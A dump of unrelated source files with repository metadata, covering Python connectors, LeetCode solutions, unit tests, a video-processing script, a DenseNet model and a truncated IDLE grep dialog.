-> MutableMapping[str, Any]: params = super().request_params(**kwargs) params["fields"] = POST_FIELDS return params class PageInsights(FacebookPagesStream): """ API docs: https://developers.facebook.com/docs/graph-api/reference/page/insights/, """ def path(self, **kwargs) -> str: return f"{self._page_id}/insights" def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]: return None def request_params( self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, any] = None, next_page_token: Mapping[str, Any] = None, ) -> MutableMapping[str, Any]: params = super().request_params(stream_state, stream_slice, next_page_token) params["metric"] = ",".join(PAGE_METRICS) return params class PostInsights(FacebookPagesStream): """ API docs: https://developers.facebook.com/docs/graph-api/reference/post/insights/, """ def path(self, **kwargs) -> str: return f"{self._page_id}/posts" def request_params( self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, any] = None, next_page_token: Mapping[str, Any] = None, ) -> MutableMapping[str, Any]: params = super().request_params(stream_state, stream_slice, next_page_token) params["fields"] = f'insights.metric({",".join(POST_METRICS)})' return params def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]: # unique case so we override this method records = response.json().get(self.data_field) or [] for insights in records: if insights.get("insights"): data = insights.get("insights").get("data") for insight in data: yield insight else: yield insights
ff48c9f51db42b5415104dcad82dcc5e7180f1a0
a097ecf40fee329cfa9e3f77e4b6e9e29a8f148a
/5_section/5_c4.py
ad4129556566f3c699ab43db88f59f5c50ed0ab1
[]
no_license
FumihisaKobayashi/The_self_taught_python
1e7008b17050db3e615c2f3aa68df2edc7f93192
329d376689029b75da73a6f98715cc7e83e8cc2c
refs/heads/master
2021-01-06T16:04:13.382955
2020-07-28T14:39:24
2020-07-28T14:39:24
241,389,313
1
0
null
null
null
null
UTF-8
Python
false
false
215
py
fumi = { "身長": "1.73m", "好きな色": "緑", "好きな人": "Hideki Matsui" } answer = input("身長,好きな色 or 好きな人") if answer in fumi: a = fumi[answer] print(a) #:注意
3d1e771da9ec0f32bfd297a1b19794e9054adce4
1825283527f5a479204708feeaf55f4ab6d1290b
/leetcode/python/45/sol.py
3db6f97188dd189aef4c4caf07b43524d9f7f299
[]
no_license
frankieliu/problems
b82c61d3328ffcc1da2cbc95712563355f5d44b5
911c6622448a4be041834bcab25051dd0f9209b2
refs/heads/master
2023-01-06T14:41:58.044871
2019-11-24T03:47:22
2019-11-24T03:47:22
115,065,956
1
0
null
2023-01-04T07:25:52
2017-12-22T02:06:57
HTML
UTF-8
Python
false
false
2,156
py
10-lines C++ (16ms) / Python BFS Solutions with Explanations https://leetcode.com/problems/jump-game-ii/discuss/18019 * Lang: python3 * Author: jianchao-li * Votes: 71 This problem has a nice BFS structure. Let's illustrate it using the example `nums = [2, 3, 1, 1, 4]` in the problem statement. We are initially at position `0`. Then we can move at most `nums[0]` steps from it. So, after one move, we may reach `nums[1] = 3` or `nums[2] = 1`. So these nodes are reachable in `1` move. From these nodes, we can further move to `nums[3] = 1` and `nums[4] = 4`. Now you can see that the target `nums[4] = 4` is reachable in `2` moves. Putting these into codes, we keep two pointers `start` and `end` that record the current range of the starting nodes. Each time after we make a move, update `start` to be `end + 1` and `end` to be the farthest index that can be reached in `1` move from the current `[start, end]`. To get an accepted solution, it is important to handle all the edge cases. And the following codes handle all of them in a unified way without using the unclean `if` statements :-) ---------- **C++** class Solution { public: int jump(vector<int>& nums) { int n = nums.size(), step = 0, start = 0, end = 0; while (end < n - 1) { step++; int maxend = end + 1; for (int i = start; i <= end; i++) { if (i + nums[i] >= n - 1) return step; maxend = max(maxend, i + nums[i]); } start = end + 1; end = maxend; } return step; } }; ---------- **Python** class Solution: # @param {integer[]} nums # @return {integer} def jump(self, nums): n, start, end, step = len(nums), 0, 0, 0 while end < n - 1: step += 1 maxend = end + 1 for i in range(start, end + 1): if i + nums[i] >= n - 1: return step maxend = max(maxend, i + nums[i]) start, end = end + 1, maxend return step
13f1896c22ae2a9880e175bd288981ebe1216ccf
8d5ba6747531cbd43d63d32265fd608f9081c3b7
/.venv/lib/python2.7/site-packages/indico/modules/events/logs/controllers.py
a436382fa8b13d29f35d97c1b401f0e523a58dd9
[]
no_license
Collinsnyamao/indico
0e433b78803afae5b1ac90483db1f3d90ce2fddb
32adf8123e266eb81439b654abc993b98e0cd7f2
refs/heads/master
2020-03-18T04:55:40.386595
2018-06-02T13:45:47
2018-06-02T13:45:47
134,314,163
1
0
null
null
null
null
UTF-8
Python
false
false
1,324
py
# This file is part of Indico. # Copyright (C) 2002 - 2018 European Organization for Nuclear Research (CERN). # # Indico is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License as # published by the Free Software Foundation; either version 3 of the # License, or (at your option) any later version. # # Indico is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Indico; if not, see <http://www.gnu.org/licenses/>. from __future__ import unicode_literals from indico.modules.events.logs.models.entries import EventLogEntry from indico.modules.events.logs.views import WPEventLogs from indico.modules.events.management.controllers import RHManageEventBase class RHEventLogs(RHManageEventBase): """Shows the modification/action log for the event""" def _process(self): entries = self.event.log_entries.order_by(EventLogEntry.logged_dt.desc()).all() realms = {e.realm for e in entries} return WPEventLogs.render_template('logs.html', self.event, entries=entries, realms=realms)
c35827798e41b221d01c7605547d9563c1b93e01
c040de12811afa588a23ad6c0cd4fdc849ab469f
/saklient/cloud/errors/usernotspecifiedexception.py
4bd94f412d92c987223a12491a2dad83d3c4cda1
[ "MIT" ]
permissive
toshitanian/saklient.python
3707d1113744122c5ab1ae793f22c6c3a0f65bc4
287c56915dd825d676eddc538cbb33b483803dc2
refs/heads/master
2021-05-28T08:13:16.851101
2014-10-09T09:54:03
2014-10-09T09:54:03
null
0
0
null
null
null
null
UTF-8
Python
false
false
790
py
# -*- coding:utf-8 -*- from ...errors.httpforbiddenexception import HttpForbiddenException # module saklient.cloud.errors.usernotspecifiedexception class UserNotSpecifiedException(HttpForbiddenException): ## 要求された操作は許可されていません。このAPIはユーザを特定できる認証方法でアクセスする必要があります。 ## @param {int} status # @param {str} code=None # @param {str} message="" def __init__(self, status, code=None, message=""): super(UserNotSpecifiedException, self).__init__(status, code, "要求された操作は許可されていません。このAPIはユーザを特定できる認証方法でアクセスする必要があります。" if message is None or message == "" else message)
c6eafbbe4676917c6f23a05bc73e21e549c0ba3f
43842089122512e6b303ebd05fc00bb98066a5b2
/dynamic_programming/120_triangle.py
99985fab0c45baef506be9737699a9531b32e925
[]
no_license
mistrydarshan99/Leetcode-3
a40e14e62dd400ddb6fa824667533b5ee44d5f45
bf98c8fa31043a45b3d21cfe78d4e08f9cac9de6
refs/heads/master
2022-04-16T11:26:56.028084
2020-02-28T23:04:06
2020-02-28T23:04:06
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,507
py
""" Given a triangle, find the minimum path sum from top to bottom. Each step you may move to adjacent numbers on the row below. For example, given the following triangle [ [2], [3,4], [6,5,7], [4,1,8,3] ] The minimum path sum from top to bottom is 11 (i.e., 2 + 3 + 5 + 1 = 11). """ class Solution(object): def minimumTotal_1(self, triangle): """ :type triangle: List[List[int]] :rtype: int """ result = [] for line in range(1, len(triangle)): result.append([0] * line) result.append(triangle[-1]) for i in reversed(range(len(triangle))): for j in range(i): result[i - 1][j] = min(result[i][j], result[i][j+1]) + triangle[i - 1][j] return result[0][0] def minimumTotal_2(self, triangle): # modify the triangle in place if not triangle: return for i in range(len(triangle)-2, -1, -1): for j in range(len(triangle[i])): triangle[i][j] = min(triangle[i+1][j], triangle[i+1][j+1]) + triangle[i][j] return triangle[0][0] def minimumTotal_3(self, triangle): # O(n) space if not triangle: return result = triangle[-1] for i in range(len(triangle) - 2, -1, -1): for j in range(len(triangle[i])): result[j] = min(result[j], result[j+1]) + triangle[i][j] return result[0] triangle_1 = [[2],[3,4],[6,5,7],[4,1,8,3]]
12431f449479c4225d285315b7a3bb921570c910
efcd21234f3291e8fc561f49a7c88fc57a63e952
/tests/unit/language/ast/test_directive_definition.py
b356575d34de9eab8e68c11d4445ef82a42fc23c
[ "MIT" ]
permissive
tartiflette/tartiflette
146214a43847d2f423bf74594643c1fdefc746f1
421c1e937f553d6a5bf2f30154022c0d77053cfb
refs/heads/master
2023-09-01T02:40:05.974025
2022-01-20T14:55:31
2022-01-20T14:55:31
119,035,565
586
39
MIT
2023-09-11T07:49:27
2018-01-26T09:56:10
Python
UTF-8
Python
false
false
6,673
py
import pytest from tartiflette.language.ast import DirectiveDefinitionNode def test_directivedefinitionnode__init__(): directive_definition_node = DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ) assert directive_definition_node.name == "directiveDefinitionName" assert ( directive_definition_node.locations == "directiveDefinitionLocations" ) assert ( directive_definition_node.description == "directiveDefinitionDescription" ) assert ( directive_definition_node.arguments == "directiveDefinitionArguments" ) assert directive_definition_node.location == "directiveDefinitionLocation" @pytest.mark.parametrize( "directive_definition_node,other,expected", [ ( DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), Ellipsis, False, ), ( DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), DirectiveDefinitionNode( name="directiveDefinitionNameBis", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), False, ), ( DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocationsBis", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), False, ), ( DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescriptionBis", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), False, ), ( DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArgumentsBis", location="directiveDefinitionLocation", ), False, ), ( DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocationBis", ), False, ), ( DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), True, ), ], ) def test_directivedefinitionnode__eq__( directive_definition_node, other, expected ): assert (directive_definition_node == other) is expected @pytest.mark.parametrize( "directive_definition_node,expected", [ ( DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), "DirectiveDefinitionNode(" "description='directiveDefinitionDescription', " "name='directiveDefinitionName', " "arguments='directiveDefinitionArguments', " "locations='directiveDefinitionLocations', " "location='directiveDefinitionLocation')", ) ], ) def test_directivedefinitionnode__repr__(directive_definition_node, expected): assert directive_definition_node.__repr__() == expected
3273285dc5118a47952c40dfdd26e29bd612aa47
46f03a8353b3fd0cd1ca35e0d322c4a53649596b
/try.py
193887977e7feaeaa8f466637561399d7a348948
[]
no_license
dragikamov/Video_Converter
d7d73a948853c99840606b89fc79dbcf8e1bde97
e0233f9c190618e30bb85bcfa9df881f0eee058e
refs/heads/master
2020-04-30T15:50:35.037923
2019-03-30T22:35:29
2019-03-30T22:35:29
176,931,695
0
0
null
null
null
null
UTF-8
Python
false
false
7,925
py
import cv2 import numpy as np import os from canny_edge import * import threading from os.path import isfile, join # Function for converting an image to grayscale def rgb2gray(rgb): return np.dot(rgb[...,:3], [0.299, 0.587, 0.114]) # Export of video def exportVid(): frame_array = [] files = [f for f in os.listdir('data/') if isfile(join('data/', f))] files.sort(key = lambda x: int(x[5:-4])) for i in range(len(files)): filename = 'data/' + files[i] img = cv2.imread(filename) height, width, _ = img.shape size = (width,height) print(filename) frame_array.append(img) fourcc = cv2.VideoWriter_fourcc(*'DIVX') out = cv2.VideoWriter('export.avi', fourcc, 24.0, (width,height)) for i in range(len(frame_array)): out.write(frame_array[i]) out.release() def thread(i, imgs): t1 = threading.Thread(target=detect, args=(imgs[0], i + 1)) t2 = threading.Thread(target=detect, args=(imgs[1], i + 2)) t3 = threading.Thread(target=detect, args=(imgs[2], i + 3)) t4 = threading.Thread(target=detect, args=(imgs[3], i + 4)) t5 = threading.Thread(target=detect, args=(imgs[4], i + 5)) t6 = threading.Thread(target=detect, args=(imgs[5], i + 6)) t7 = threading.Thread(target=detect, args=(imgs[6], i + 7)) t8 = threading.Thread(target=detect, args=(imgs[7], i + 8)) t9 = threading.Thread(target=detect, args=(imgs[8], i + 9)) t10 = threading.Thread(target=detect, args=(imgs[9], i + 10)) t11 = threading.Thread(target=detect, args=(imgs[10], i + 11)) t12 = threading.Thread(target=detect, args=(imgs[11], i + 12)) t13 = threading.Thread(target=detect, args=(imgs[12], i + 13)) t14 = threading.Thread(target=detect, args=(imgs[13], i + 14)) t15 = threading.Thread(target=detect, args=(imgs[14], i + 15)) t16 = threading.Thread(target=detect, args=(imgs[15], i + 16)) t17 = threading.Thread(target=detect, args=(imgs[16], i + 17)) t18 = threading.Thread(target=detect, args=(imgs[17], i + 18)) t19 = threading.Thread(target=detect, args=(imgs[18], i + 19)) t20 = threading.Thread(target=detect, args=(imgs[19], i + 20)) t21 = threading.Thread(target=detect, args=(imgs[20], i + 21)) t22 = threading.Thread(target=detect, args=(imgs[21], i + 22)) t23 = threading.Thread(target=detect, args=(imgs[22], i + 23)) t24 = threading.Thread(target=detect, args=(imgs[23], i + 24)) t25 = threading.Thread(target=detect, args=(imgs[24], i + 25)) t26 = threading.Thread(target=detect, args=(imgs[25], i + 26)) t27 = threading.Thread(target=detect, args=(imgs[26], i + 27)) t28 = threading.Thread(target=detect, args=(imgs[27], i + 28)) t29 = threading.Thread(target=detect, args=(imgs[28], i + 29)) t30 = threading.Thread(target=detect, args=(imgs[29], i + 30)) t31 = threading.Thread(target=detect, args=(imgs[30], i + 31)) t32 = threading.Thread(target=detect, args=(imgs[31], i + 32)) t33 = threading.Thread(target=detect, args=(imgs[32], i + 33)) t34 = threading.Thread(target=detect, args=(imgs[33], i + 34)) t35 = threading.Thread(target=detect, args=(imgs[34], i + 35)) t36 = threading.Thread(target=detect, args=(imgs[35], i + 36)) t37 = threading.Thread(target=detect, args=(imgs[36], i + 37)) t38 = threading.Thread(target=detect, args=(imgs[37], i + 38)) t39 = threading.Thread(target=detect, args=(imgs[38], i + 39)) t40 = threading.Thread(target=detect, args=(imgs[39], i + 40)) t41 = threading.Thread(target=detect, args=(imgs[40], i + 41)) t42 = threading.Thread(target=detect, args=(imgs[41], i + 42)) t43 = threading.Thread(target=detect, args=(imgs[42], i + 43)) t44 = threading.Thread(target=detect, args=(imgs[43], i + 44)) t45 = threading.Thread(target=detect, args=(imgs[44], i + 45)) t46 = threading.Thread(target=detect, args=(imgs[45], i + 46)) t47 = threading.Thread(target=detect, args=(imgs[46], i + 47)) t48 = threading.Thread(target=detect, args=(imgs[47], i + 48)) t49 = threading.Thread(target=detect, args=(imgs[48], i + 49)) t50 = threading.Thread(target=detect, args=(imgs[49], i + 50)) t51 = threading.Thread(target=detect, args=(imgs[50], i + 51)) t52 = threading.Thread(target=detect, args=(imgs[51], i + 52)) t53 = threading.Thread(target=detect, args=(imgs[52], i + 53)) t54 = threading.Thread(target=detect, args=(imgs[53], i + 54)) t55 = threading.Thread(target=detect, args=(imgs[54], i + 55)) t56 = threading.Thread(target=detect, args=(imgs[55], i + 56)) t57 = threading.Thread(target=detect, args=(imgs[56], i + 57)) t58 = threading.Thread(target=detect, args=(imgs[57], i + 58)) t59 = threading.Thread(target=detect, args=(imgs[58], i + 59)) t60 = threading.Thread(target=detect, args=(imgs[59], i + 60)) t1.start() t2.start() t3.start() t4.start() t5.start() t6.start() t7.start() t8.start() t9.start() t10.start() t11.start() t12.start() t13.start() t14.start() t15.start() t16.start() t17.start() t18.start() t19.start() t20.start() t21.start() t22.start() t23.start() t24.start() t25.start() t26.start() t27.start() t28.start() t29.start() t30.start() t31.start() t32.start() t33.start() t34.start() t35.start() t36.start() t37.start() t38.start() t39.start() t40.start() t41.start() t42.start() t43.start() t44.start() t45.start() t46.start() t47.start() t48.start() t49.start() t50.start() t51.start() t52.start() t53.start() t54.start() t55.start() t56.start() t57.start() t58.start() t59.start() t60.start() t1.join() t2.join() t3.join() t4.join() t5.join() t6.join() t7.join() t8.join() t9.join() t10.join() t11.join() t12.join() t13.join() t14.join() t15.join() t16.join() t17.join() t18.join() t19.join() t20.join() t21.join() t22.join() t23.join() t24.join() t25.join() t26.join() t27.join() t28.join() t29.join() t30.join() t31.join() t32.join() t33.join() t34.join() t35.join() t36.join() t37.join() t38.join() t39.join() t40.join() t41.join() t42.join() t43.join() t44.join() t45.join() t46.join() t47.join() t48.join() t49.join() t50.join() t51.join() t52.join() t53.join() t54.join() t55.join() t56.join() t57.join() t58.join() t59.join() t60.join() # Loading the video into python cap = cv2.VideoCapture('bunny.mp4') # Making a folder for the edited frames try: if not os.path.exists('data'): os.makedirs('data') except OSError: print ('Error: Creating directory of data') currentFrame = 0 imgs = [] height = 0 width = 0 n = 0 while(True): # Capture frame-by-frame ret, frame = cap.read() if not ret: if(len(imgs) != 0): for i in range(len(imgs)): detect(img[i], currentFrame) break # Converting the frame to grayscale and adding it to a list name = './data/frame' + str(currentFrame) + '.jpg' print ('Slicing and converting to grayscale...' + name) imgs.append(rgb2gray(frame)) if(currentFrame % 60 == 0 and currentFrame != 0): thread((currentFrame / 60) - 1, imgs) imgs = [] # Find height and width height, width, _ = frame.shape currentFrame += 1 image_folder = 'data' images = [img for img in os.listdir(image_folder) if img.endswith(".jpg")] frame = cv2.imread(os.path.join(image_folder, images[0])) height, width, _ = frame.shape exportVid() # When everything done, release the capture cap.release() cv2.destroyAllWindows()
ee0ea350d13c32438c662a8a258423d9b8287956
20c4a239e000b15131251d372ccad9110063a961
/setup.py
91ea45b7093ebde7a34cf7d5eb933f7529893fdf
[ "MIT" ]
permissive
Partidani/hdlConvertor
9d0e382e6e087ac240502538b63f8667004a7715
36d3b58e2641e39c323ed9ee337135e49c64d076
refs/heads/master
2023-04-06T00:03:31.505727
2021-04-19T07:28:25
2021-04-19T07:28:25
366,418,686
0
0
null
null
null
null
UTF-8
Python
false
false
1,810
py
#!/usr/bin/env python3 # -*- coding: UTF-8 -*- import os from setuptools import find_packages try: from skbuild import setup except ImportError: raise ImportError("Missing scikit-build, (should be automatically installed by pip)") import sys this_directory = os.path.abspath(os.path.dirname(__file__)) with open(os.path.join(this_directory, "README.md")) as f: long_description = f.read() deps = ["typing", "future"] if sys.version_info[0] == 2 else [] setup( cmake_args=[ # '-DCMAKE_BUILD_TYPE=Debug' ], name='hdlConvertor', version='2.2', description='VHDL and System Verilog parser written in c++', long_description=long_description, long_description_content_type="text/markdown", url='https://github.com/Nic30/hdlConvertor', author='Michal Orsak', author_email='[email protected]', keywords=['hdl', 'vhdl', 'verilog', 'system verilog', 'parser', 'preprocessor', 'antlr4'], classifiers=[ 'Development Status :: 4 - Beta', 'Intended Audience :: Developers', 'Intended Audience :: Science/Research', 'Operating System :: OS Independent', 'Topic :: Software Development :: Build Tools', 'Programming Language :: C++', 'Programming Language :: Cython', 'Programming Language :: Python :: Implementation :: CPython', 'Programming Language :: Python :: 2.7', 'Programming Language :: Python :: 3', 'Topic :: Scientific/Engineering :: Electronic Design Automation (EDA)', ], install_requires=[ 'hdlConvertorAst>=0.7', ] + deps, license="MIT", packages=find_packages(exclude=["tests", ]), test_suite="tests.main_test_suite", test_runner="tests:TimeLoggingTestRunner", tests_require=deps, )
8bfa5c02a3089abb03156a6609bfed1a989474e9
d5f8ca3c13f681d147b7614f1902df7ba34e06f9
/Graduate/model/densenet.py
38359413ab29892a7c8f412c5fc1741039a65696
[]
no_license
hhjung1202/OwnAdaptation
29a6c0a603ab9233baf293096fb9e7e956647a10
50805730254419f090f4854387be79648a01fbb4
refs/heads/master
2021-06-25T22:31:15.437642
2020-11-26T18:19:55
2020-11-26T18:19:55
176,670,379
1
0
null
2020-06-11T07:35:55
2019-03-20T06:36:19
Python
UTF-8
Python
false
false
7,429
py
import torch import torch.nn as nn import torch.nn.functional as F from collections import OrderedDict from torch import Tensor import itertools class Flatten(nn.Module): def forward(self, x): return x.view(x.size(0), -1) class _Gate_selection(nn.Sequential): phase = 2 def __init__(self, num_input_features, growth_rate, count, reduction=4): super(_Gate_selection, self).__init__() self.actual = (count+1) // 2 LongTensor = torch.cuda.LongTensor if torch.cuda.is_available() else torch.LongTensor self.init = LongTensor([i for i in range(num_input_features)]).view(1, -1) s = num_input_features arr = [] for j in range(count): arr += [[i for i in range(s, s + growth_rate)]] s+=growth_rate self.arr = LongTensor(arr) self.avg_pool = nn.AdaptiveAvgPool2d(1) channels = num_input_features + growth_rate * count self.fc1 = nn.Linear(channels, channels//reduction) self.relu = nn.ReLU(inplace=True) self.fc2 = nn.Linear(channels//reduction, count) self.sigmoid = nn.Sigmoid() self.flat = Flatten() def forward(self, x, x_norm): b, _, w, h = x_norm.size() out = self.avg_pool(x_norm) # batch, channel 합친거, w, h out = self.flat(out) out = self.relu(self.fc1(out)) out = self.sigmoid(self.fc2(out)) _, sort = out.sort() indices = sort[:,:self.actual] # batch, sort # shuffle indices = indices[:, torch.randperm(indices.size(1))] select = self.init.repeat(b,1) select = torch.cat([select, self.arr[indices].view(b,-1)], 1) select = select.view(select.size(0), -1, 1, 1).repeat(1,1,w,h) x = x.gather(1, select) return x class _Bottleneck(nn.Sequential): def __init__(self, num_input_features, growth_rate, count=1): super(_Bottleneck, self).__init__() self.norm1 = nn.BatchNorm2d(num_input_features) self.relu = nn.ReLU(inplace=True) self.conv1 = nn.Conv2d(num_input_features, 4 * growth_rate, kernel_size=1, stride=1, bias=False) self.norm2 = nn.BatchNorm2d(4 * growth_rate) self.conv2 = nn.Conv2d(4 * growth_rate, growth_rate, kernel_size=3, stride=1, padding=1, bias=False) self.count = count def forward(self, x): if isinstance(x, Tensor): x = [x] out = torch.cat(x,1) out = self.norm1(out) out = self.relu(out) out = self.conv1(out) out = self.norm2(out) out = self.relu(out) out = self.conv2(out) return out class _Basic(nn.Sequential): def __init__(self, num_input_features, growth_rate): super(_Basic, self).__init__() self.norm1 = nn.BatchNorm2d(num_input_features) self.relu = nn.ReLU(inplace=True) self.conv1 = nn.Conv2d(num_input_features, growth_rate, kernel_size=3, stride=1, padding=1, bias=False) self.count = count def forward(self, x): if isinstance(x, Tensor): x = [x] out = torch.cat(x,1) out = self.norm1(out) out = self.relu(out) out = self.conv1(out) return out class _DenseLayer(nn.Module): def __init__(self, num_input_features, growth_rate, num_layers, Block): super(_DenseLayer, self).__init__() self.num_layers = num_layers self.init_block = Block(num_input_features, growth_rate) for i in range(1, num_layers): j = (i-1)//2 + 1 setattr(self, 'layer{}'.format(i), Block(num_input_features + growth_rate * j, growth_rate)) setattr(self, 'norm{}'.format(i), nn.BatchNorm2d(num_input_features + growth_rate * (i+1))) setattr(self, 'gate{}'.format(i), _Gate_selection(num_input_features, growth_rate, i+1, reduction=4)) def forward(self, x): out = self.init_block(x) x = [x] + [out] out = torch.cat(x,1) for i in range(1, self.num_layers): out = getattr(self, 'layer{}'.format(i))(out) x += [out] x_cat = torch.cat(x,1) x_norm = getattr(self, 'norm{}'.format(i))(x_cat) out = getattr(self, 'gate{}'.format(i))(x_cat, x_norm) return x_cat class _Transition(nn.Sequential): def __init__(self, num_input_features, tr_features): super(_Transition, self).__init__() self.norm = nn.BatchNorm2d(tr_features) self.relu = nn.ReLU(inplace=True) self.conv = nn.Conv2d(tr_features, num_input_features // 2, kernel_size=1, stride=1, bias=False) self.pool = nn.AvgPool2d(kernel_size=2, stride=2) def forward(self, x): # out = torch.cat(x,1) out = self.norm(x) out = self.relu(out) out = self.conv(out) out = self.pool(out) return out class DenseNet(nn.Module): def __init__(self, growth_rate=12, num_init_features=24, num_classes=10, is_bottleneck=True, layer=28): super(DenseNet, self).__init__() if layer is 28: block_config=[4,4,4] elif layer is 40: block_config=[6,6,6] elif layer is 52: block_config=[8,8,8] elif layer is 64: block_config=[10,10,10] if is_bottleneck: Block = _Bottleneck else: Block = _Basic block_config = [2*x for x in block_config] self.features = nn.Sequential() self.features.add_module('conv0', nn.Conv2d(3, num_init_features, kernel_size=3, stride=1, padding=1, bias=False)) num_features = num_init_features for i in range(len(block_config)): self.features.add_module('layer%d' % (i + 1), _DenseLayer(num_features, growth_rate, block_config[i], Block)) tr_features = num_features + block_config[i] * growth_rate num_features = num_features + block_config[i] * growth_rate // 2 if i != len(block_config) - 1: self.features.add_module('transition%d' % (i + 1), _Transition(num_features, tr_features)) num_features = num_features // 2 # Final batch norm self.norm = nn.BatchNorm2d(tr_features) self.relu = nn.ReLU(inplace=True) self.pool = nn.AvgPool2d(kernel_size=8, stride=1) self.fc = nn.Linear(tr_features, num_classes) for m in self.modules(): if isinstance(m, nn.Conv2d): nn.init.kaiming_normal_(m.weight) elif isinstance(m, nn.BatchNorm2d): nn.init.constant_(m.weight, 1) nn.init.constant_(m.bias, 0) elif isinstance(m, nn.Linear): nn.init.constant_(m.bias, 0) # Linear layer # Official init from torch repo. def forward(self, x): out = self.features(x) # out = torch.cat(out,1) out = self.norm(out) out = self.relu(out) out = self.pool(out) out = out.view(out.size(0), -1) out = self.fc(out) return out if __name__=='__main__': x = torch.randn(4,3,32,32) model = DenseNet(growth_rate=12, num_init_features=24, num_classes=10, is_bottleneck=True, layer=40) y = model(x) print(y.size())
da39ff189fd2c0d2ba922949117085f9ce98e2fa
85be450530138c8b66c513c4283bcb1d58caeeb0
/apps/funcionarios/migrations/0005_funcionario_imagem.py
bc149c39e59bf25051a7e604642ca132a0e9a4c1
[]
no_license
fgomesc/gestao_teste
6be81a263fddb1b1e5d6a2d768387fc024e9bdc3
b2890ffa99361dd30b002706c94d1e5299651315
refs/heads/master
2021-09-25T06:21:51.602878
2021-09-14T18:27:13
2021-09-14T18:27:13
236,030,673
0
0
null
2021-06-10T22:31:09
2020-01-24T15:42:59
JavaScript
UTF-8
Python
false
false
446
py
# Generated by Django 2.1.1 on 2018-11-17 12:21 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('funcionarios', '0004_auto_20181029_2313'), ] operations = [ migrations.AddField( model_name='funcionario', name='imagem', field=models.ImageField(default=1, upload_to='fotos'), preserve_default=False, ), ]
041cf40053b8f029ba5b1f64754d2048cbb70f5e
2af6a5c2d33e2046a1d25ae9dd66d349d3833940
/res_bw/scripts/common/lib/idlelib/grepdialog.py
05f4b74a7d37f75455c785428aa681b07d431a4b
[]
no_license
webiumsk/WOT-0.9.12-CT
e6c8b5bb106fad71b5c3056ada59fb1aebc5f2b2
2506e34bd6634ad500b6501f4ed4f04af3f43fa0
refs/heads/master
2021-01-10T01:38:38.080814
2015-11-11T00:08:04
2015-11-11T00:08:04
45,803,240
0
0
null
null
null
null
WINDOWS-1250
Python
false
false
4,154
py
# 2015.11.10 21:36:11 Střední Evropa (běžný čas) # Embedded file name: scripts/common/Lib/idlelib/GrepDialog.py import os import fnmatch import sys from Tkinter import * from idlelib import SearchEngine from idlelib.SearchDialogBase import SearchDialogBase def grep(text, io = None, flist = None): root = text._root() engine = SearchEngine.get(root) if not hasattr(engine, '_grepdialog'): engine._grepdialog = GrepDialog(root, engine, flist) dialog = engine._grepdialog searchphrase = text.get('sel.first', 'sel.last') dialog.open(text, searchphrase, io) class GrepDialog(SearchDialogBase): title = 'Find in Files Dialog' icon = 'Grep' needwrapbutton = 0 def __init__(self, root, engine, flist): SearchDialogBase.__init__(self, root, engine) self.flist = flist self.globvar = StringVar(root) self.recvar = BooleanVar(root) def open(self, text, searchphrase, io = None): SearchDialogBase.open(self, text, searchphrase) if io: path = io.filename or '' else: path = '' dir, base = os.path.split(path) head, tail = os.path.splitext(base) if not tail: tail = '.py' self.globvar.set(os.path.join(dir, '*' + tail)) def create_entries(self): SearchDialogBase.create_entries(self) self.globent = self.make_entry('In files:', self.globvar) def create_other_buttons(self): f = self.make_frame() btn = Checkbutton(f, anchor='w', variable=self.recvar, text='Recurse down subdirectories') btn.pack(side='top', fill='both') btn.select() def create_command_buttons(self): SearchDialogBase.create_command_buttons(self) self.make_button('Search Files', self.default_command, 1) def default_command(self, event = None): prog = self.engine.getprog() if not prog: return path = self.globvar.get() if not path: self.top.bell() return from idlelib.OutputWindow import OutputWindow save = sys.stdout try: sys.stdout = OutputWindow(self.flist) self.grep_it(prog, path) finally: sys.stdout = save def grep_it(self, prog, path): dir, base = os.path.split(path) list = 